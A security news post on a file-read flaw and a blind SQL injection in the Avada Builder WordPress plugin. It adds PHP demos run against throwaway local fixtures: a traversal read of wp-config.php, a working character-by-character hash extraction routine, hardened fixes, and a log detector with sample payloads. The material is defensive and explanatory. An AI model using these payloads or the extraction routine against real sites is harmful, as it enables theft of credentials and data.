Cyber Web Spider Blog – News

Over 1 Million WordPress Sites Vulnerable to Avada Plugin Flaws


Posted on May 18, 2026 By CWS

A security advisory has been published for the Avada Builder WordPress plugin, which is active on more than one million websites. Two vulnerabilities in the plugin let attackers read files on the server and extract data from the site's database.

Details of the Avada Builder Vulnerabilities

Researcher Rafie Muhammad reported both flaws through the Wordfence Bug Bounty Program: an arbitrary file read (CVE-2026-4782) and a SQL injection (CVE-2026-4798). Now that the details are public, unpatched sites should be expected to see exploitation attempts.

The file read affects Avada Builder versions up to and including 3.15.2; the SQL injection affects versions up to and including 3.15.1. Both call for an immediate update.

Arbitrary File Read Risk

The first vulnerability lets any authenticated user, including accounts with the lowest-privileged Subscriber role, read files from the server. The cause is insufficient validation of the custom_svg attribute of one of the plugin's shortcodes: the value is used to locate the file to read, so it can be pointed at files outside the intended directory, such as wp-config.php. That file holds the database credentials and the authentication keys and salts on which the site's security depends.

Its CVSS score of 6.5 makes it a medium-severity issue on paper, but the practical risk is high: the database credentials in wp-config.php give full access to the site's data wherever the database is reachable, and the leaked keys and salts undermine the integrity of WordPress authentication cookies.
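To show what "inadequate validation of a file-selecting attribute" looks like and how to close it, here is an added example in PHP. It is not Avada's code: the shortcode handler, the attribute semantics (custom_svg names an SVG under the uploads directory) and the throwaway site layout are all assumptions made for the demonstration. The hardened variant resolves the path with realpath(), refuses anything that leaves the uploads directory, and checks both the extension and the file's leading bytes.

```php
<?php
declare(strict_types=1);

// Added example, not Avada's code. Assumptions: a shortcode attribute named
// custom_svg selects an SVG file under the uploads directory, and $uploadsDir is
// what a real plugin would get from wp_upload_dir()['basedir'].

/** Vulnerable pattern: the attribute is joined onto a base path and read as-is. */
function render_svg_vulnerable(array $atts, string $uploadsDir): string
{
    // "../../wp-config.php" walks out of uploads; nothing stops it.
    return (string) file_get_contents($uploadsDir . '/' . $atts['custom_svg']);
}

/** Hardened: resolve the path, keep it inside uploads, require .svg and SVG content. */
function render_svg_hardened(array $atts, string $uploadsDir): string
{
    $base = realpath($uploadsDir);
    $real = realpath($uploadsDir . '/' . $atts['custom_svg']);
    if ($base === false || $real === false) {
        throw new InvalidArgumentException('file not found');
    }
    // Containment: after symlink and ".." resolution the file must still be below $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        throw new InvalidArgumentException('path escapes the uploads directory');
    }
    if (strtolower(pathinfo($real, PATHINFO_EXTENSION)) !== 'svg') {
        throw new InvalidArgumentException('not an .svg file');
    }
    $data = (string) file_get_contents($real);
    // Content check: the file must actually start as an SVG document.
    if (!preg_match('/^\s*(<\?xml[^>]*>\s*)?(<!--.*?-->\s*)*<svg\b/s', $data)) {
        throw new InvalidArgumentException('file content is not SVG');
    }
    return $data;
}

// Constructed fixture: a throwaway "site" with wp-config.php two levels above uploads.
$site    = sys_get_temp_dir() . '/svg_demo_' . bin2hex(random_bytes(4));
$uploads = "$site/wp-content/uploads";
mkdir($uploads, 0700, true);
file_put_contents("$site/wp-config.php", "<?php define('DB_PASSWORD', 'constructed-secret');\n");
file_put_contents("$uploads/logo.svg", '<svg xmlns="http://www.w3.org/2000/svg"></svg>');

$attack = ['custom_svg' => '../../wp-config.php'];
$benign = ['custom_svg' => 'logo.svg'];

echo "vulnerable handler, attacker input:\n", render_svg_vulnerable($attack, $uploads);
echo "hardened handler, benign input: ", render_svg_hardened($benign, $uploads), "\n";
try {
    render_svg_hardened($attack, $uploads);
} catch (InvalidArgumentException $e) {
    echo "hardened handler, attacker input: rejected (", $e->getMessage(), ")\n";
}

// Remove the fixture.
unlink("$uploads/logo.svg");
unlink("$site/wp-config.php");
rmdir($uploads);
rmdir("$site/wp-content");
rmdir($site);
```

Run it with `php` on the command line. The containment check compares against the resolved base path plus a separator, so a sibling directory whose name merely starts with "uploads" does not pass. Note that keeping the read inside the uploads directory closes the file-read issue only; SVG markup that is echoed into a page still needs sanitising, because SVG can carry script.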

SQL Injection Threat

The second vulnerability is rated higher, with a CVSS score of 7.5, because it requires no authentication at all. The product_order parameter is placed into a database query without adequate escaping or a prepared statement, so an attacker can inject SQL into it. The injection is time-based: the query's output is not returned to the attacker, so they inject conditional delays and infer the data one true/false question at a time from how long the page takes to respond.

Attackers can use this to extract sensitive data, such as user credentials, from the database; the report notes that sites where WooCommerce was installed and later disabled are particularly exposed. The Avada development team has released fixes, with the final one in version 3.15.3 on May 12, 2026. Site owners should update to 3.15.3 or later immediately.
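The following added PHP example shows the injection class and the fix side by side. It is not Avada's code, and it assumes, purely for illustration, that product_order chooses the sort order of a product listing; the report names the parameter but not the query it lands in. The example uses an in-memory SQLite database so it runs stand-alone. SQLite has no SLEEP(), so the blind payload reads the secret through the sort direction instead of through response time; in MySQL the same ORDER BY position would take IF(condition, SLEEP(5), 0), which is the time-based form described above. The table names, the admin row and the password hash are constructed.

```php
<?php
declare(strict_types=1);

// Added example, not Avada's code. Assumption for illustration: product_order
// chooses the sort order of a product listing. SQLite in memory keeps it
// stand-alone; the blind payload uses sort direction rather than SLEEP().

function make_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)');
    $pdo->exec("INSERT INTO products VALUES (1, 'mug', 9.5), (2, 'shirt', 19.0), (3, 'hat', 12.0)");
    // Constructed secret: a users row shaped like wp_users, with a fake password hash.
    $pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)');
    $pdo->exec("INSERT INTO users VALUES (1, 'admin', '\$P\$Bconstructedhash')");
    return $pdo;
}

/** Vulnerable: the request parameter is concatenated straight into ORDER BY. */
function list_products_vulnerable(PDO $pdo, string $productOrder): array
{
    $stmt = $pdo->query("SELECT id FROM products ORDER BY $productOrder");
    return array_map('intval', $stmt->fetchAll(PDO::FETCH_COLUMN));
}

/** Hardened: identifiers and keywords cannot be bound with placeholders, so the
 *  request value is mapped onto an allow-list of fixed ORDER BY clauses. Values
 *  that belong in a WHERE clause are the other case and go through placeholders
 *  ($wpdb->prepare() in WordPress, PDO::prepare() here). */
function list_products_hardened(PDO $pdo, string $productOrder): array
{
    $allowed = [
        'name'       => 'name ASC',
        'price'      => 'price ASC',
        'price_desc' => 'price DESC',
    ];
    if (!isset($allowed[$productOrder])) {
        throw new InvalidArgumentException('unknown product_order value');
    }
    $stmt = $pdo->query('SELECT id FROM products ORDER BY ' . $allowed[$productOrder]);
    return array_map('intval', $stmt->fetchAll(PDO::FETCH_COLUMN));
}

/** Blind extraction through the vulnerable listing: one yes/no question per guess.
 *  A correct guess sorts the ids ascending; a wrong one sorts them descending. */
function leak_password_hash(PDO $pdo, int $maxLen): string
{
    $alphabet = str_split('$PB' . 'abcdefghijklmnopqrstuvwxyz0123456789./');
    $leaked = '';
    for ($pos = 1; $pos <= $maxLen; $pos++) {
        $matched = false;
        foreach ($alphabet as $c) {
            $payload = sprintf(
                "CASE WHEN (SELECT substr(user_pass,%d,1) FROM users WHERE user_login='admin')='%s' THEN id ELSE -id END",
                $pos,
                $c
            );
            if (list_products_vulnerable($pdo, $payload) === [1, 2, 3]) {
                $leaked .= $c;
                $matched = true;
                break;
            }
        }
        if (!$matched) {
            break; // end of the string, or a character outside the guess alphabet
        }
    }
    return $leaked;
}

$pdo = make_db();
echo "vulnerable: first 8 chars of the admin hash, recovered blind: ", leak_password_hash($pdo, 8), "\n";
echo "hardened, product_order=price: ids ", implode(',', list_products_hardened($pdo, 'price')), "\n";
try {
    list_products_hardened($pdo, 'CASE WHEN 1=1 THEN id ELSE -id END');
} catch (InvalidArgumentException $e) {
    echo "hardened, injected product_order: rejected (", $e->getMessage(), ")\n";
}
```

The point of the allow-list is that escaping does not help here: a payload aimed at ORDER BY needs no quote characters, so quote-escaping functions leave it intact. Only a fixed mapping from accepted request values to SQL the developer wrote can make a sort parameter safe.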

Steps to Mitigate Risks

Updating Avada Builder to the latest version is the essential step. Because the file read needs only a Subscriber account, site owners should also disable open registration (the "Anyone can register" option) unless it is needed, remove accounts that serve no purpose, and check logs for unusual file access or database queries. If there is any sign that wp-config.php was read before the patch was applied, rotate the database password and regenerate the authentication keys and salts, since the update does not revoke what has already been exposed.

A web application firewall such as Wordfence adds a further layer of protection against exploitation attempts while sites are being updated.
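As an added example of the log review suggested above, here is a small PHP checker that looks for the two parameters named in the report. It is not part of the report, Wordfence or Avada. It handles both the query-string form seen in access logs and the shortcode-attribute form seen in stored post content, since a shortcode attribute can arrive through either route; the log lines, the post content and the shortcode name demo_svg are all constructed for the demonstration, and the indicator list is a starting point rather than a complete signature set.

```php
<?php
declare(strict_types=1);

// Added detection example; not from the report, Wordfence or Avada. Looks for
// custom_svg and product_order as query parameters (access logs) or shortcode
// attributes (post content), decodes each value twice to defeat double
// URL-encoding, and applies indicator checks. Requires PHP 8 (str_contains).

/** Returns a list of [parameter, reason] pairs for anything suspicious in $text. */
function find_indicators(string $text): array
{
    $findings = [];
    // name=value (query string) or name="value" / name='value' (shortcode attribute)
    $pattern = '/\b(custom_svg|product_order)\s*=\s*(["\']?)([^"\'&\s\]]+)/i';
    if (!preg_match_all($pattern, $text, $m, PREG_SET_ORDER)) {
        return $findings;
    }
    foreach ($m as $match) {
        $name  = strtolower($match[1]);
        $value = strtolower(rawurldecode(rawurldecode($match[3])));
        if ($name === 'custom_svg') {
            if (str_contains($value, '..')) {
                $findings[] = [$name, 'directory traversal'];
            } elseif (str_contains($value, 'wp-config') || str_starts_with($value, '/')) {
                $findings[] = [$name, 'absolute path or wp-config.php reference'];
            } elseif (preg_match('/^[a-z][a-z0-9+.-]*:\/\//', $value)) {
                $findings[] = [$name, 'stream wrapper or URL scheme'];
            }
        } elseif ($name === 'product_order') {
            if (preg_match('/\b(sleep|benchmark|pg_sleep|waitfor)\b/', $value)) {
                $findings[] = [$name, 'SQL time-delay function'];
            } elseif (preg_match('/\b(select|union|case\s+when)\b|--|\/\*|[;()]/', $value)) {
                $findings[] = [$name, 'SQL syntax in a sort parameter'];
            }
        }
    }
    return $findings;
}

// Constructed samples: three combined-format access log lines and two post bodies.
$samples = [
    '203.0.113.5 - - [18/May/2026:10:01:02 +0000] "GET /shop/?product_order=price HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/May/2026:10:01:09 +0000] "GET /shop/?product_order=name%2C(SELECT%20SLEEP(5)) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/May/2026:10:02:40 +0000] "GET /?custom_svg=%252e%252e%252f%252e%252e%252fwp-config.php HTTP/1.1" 200 880 "-" "curl/8.0"',
    'Hello world [demo_svg custom_svg="logo.svg"]',
    'Hello world [demo_svg custom_svg="../../wp-config.php"]',
];

foreach ($samples as $i => $sample) {
    $found = find_indicators($sample);
    $summary = $found
        ? implode('; ', array_map(fn(array $f): string => "$f[0]: $f[1]", $found))
        : 'clean';
    printf("sample %d: %s\n", $i + 1, $summary);
}
```

Two limits worth keeping in mind when running something like this over real data: standard access logs record only the request line, so parameters sent in a POST body never appear in them, and a Subscriber who plants the shortcode in stored content leaves the attribute in the database rather than in any request. Checking post content (for example the post_content column of wp_posts) alongside the logs covers both.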

Conclusion

This incident underscores the importance of regularly auditing even widely trusted plugins, since they can introduce significant security risk. With so many installations, Avada Builder is an attractive target for attackers. Site owners must remain vigilant and patch promptly to protect their WordPress sites from exploitation.

Cyber Security News Tags:Avada Builder, CVE-2026-4782, CVE-2026-4798, file read vulnerability, plugin vulnerabilities, security flaws, SQL injection, web security, website security, Wordfence, WordPress

Copyright © 2026 Cyber Web Spider Blog – News.
